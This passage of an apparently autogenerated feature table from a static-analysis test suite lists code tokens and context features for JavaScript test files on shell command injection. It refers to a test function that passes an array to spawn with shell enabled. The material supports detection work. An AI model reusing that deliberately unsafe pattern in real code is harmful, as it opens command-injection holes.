autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:39:13:41 | cmd | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:39:13:41 | cmd | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:39:13:41 | cmd | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:13:44:13:46 | arr | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:6 | cp | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:6 | cp | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:6 | cp | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:6 | cp | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:6 | cp | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:12 | cp.spawn | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:12 | cp.spawn | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:12 | cp.spawn | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:12 | cp.spawn | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:12 | cp.spawn | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | exceptional return of cp.spaw ... true}) | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | exceptional return of cp.spaw ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | exceptional return of cp.spaw ... true}) | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | exceptional return of cp.spaw ... true}) | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | exceptional return of cp.spaw ... true}) | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:8:14:12 | spawn | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:8:14:12 | spawn | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:8:14:12 | spawn | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:8:14:12 | spawn | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:8:14:12 | spawn | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:14:14:19 | "echo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:22:14:24 | arr | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:27:14:39 | {shell: true} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:32 | shell | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:32 | shell | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:32 | shell | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:32 | shell | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:32 | shell | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:28:14:38 | shell: true | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | InputAccessPathFromCallee | 2.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | contextFunctionInterfaces | arrToShell(cmd, arr)\nexports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | contextSurroundingFunctionParameters | (cmd, arr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | enclosingFunctionBody | cmd arr cp spawn echo arr shell true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | enclosingFunctionName | arrToShell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:35:14:38 | true | fileImports | ./amd.js child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:0 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:0 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:1:1:1 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:11 | express | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:11 | express | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:5:1:32 | express ... press') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:21 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:21 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | exceptional return of require('express') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | require('express') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | require('express') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:23:1:31 | 'express' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:17 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:17 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:17 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_p ... ocess') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_p ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_p ... ocess') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:5:2:44 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:27 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:27 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | exceptional return of require ... ocess') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | exceptional return of require ... ocess') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | require ... ocess') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | require ... ocess') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:29:2:43 | 'child_process' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:12 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:12 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:12 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:12 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSyn ... xecSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSyn ... xecSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSyn ... xecSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:5:3:37 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:28 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:28 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:28 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:37 | child_p ... xecSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:37 | child_p ... xecSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:16:3:37 | child_p ... xecSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:30:3:37 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:30:3:37 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:3:30:3:37 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:8 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:8 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec = ... ss.exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec = ... ss.exec | 